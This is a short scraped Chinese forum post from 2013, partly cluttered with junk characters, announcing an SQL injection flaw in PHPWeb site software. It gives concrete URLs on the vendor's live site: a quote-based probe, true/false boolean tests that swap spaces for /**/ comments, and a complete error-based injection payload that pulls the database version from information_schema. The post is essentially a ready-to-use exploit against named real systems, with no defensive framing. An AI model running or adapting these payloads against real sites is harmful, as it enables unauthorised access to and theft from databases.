phpweb所有的整站程序伪静态页面都存在sql注入% R3 o# p* K* ~: g4 a$ J
2 {% G+ X$ s, y
主站:http://phpweb.net/
& Y4 o, e. R) ~( m" c/ o- U; s% M- t加’检测:7 l$ ~, q* z# [ e0 W& g2 L
3 ~; w, {$ y8 g4 [. X/ fhttp://www.phpweb.net/down/html/?772′.html
* @9 l2 U- Y, L4 e! P& Z7 v
' s, H. y* K' n# O出错! W7 C" g5 @, ~* |. Z3 j
存在注入。
- m, n+ J' }2 V# a1 V1 t不能用空格,只能用/*罗# C; `' `; @5 Y' U+ ^. ]2 r( W4 x
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
8 u% b; J! m- [! ^; u4 k& f/ F 7 ^+ Q0 f5 e' h) P
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.& D5 @2 Y$ Q& G$ b7 }
爆数据库版本:& ~; P) b6 B3 E
% U" @! e2 u6 Z
?
7 G" W- |" U$ w8 J6 G3 \1
( M2 m2 t9 z zhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html7 x; Y3 ?; b# v8 I
更新日期: 2013-01-03 13:39:50
- E$ l' G; ^7 z: `6 k |
发表于 2013-1-4 19:46:42
收藏
支持
反对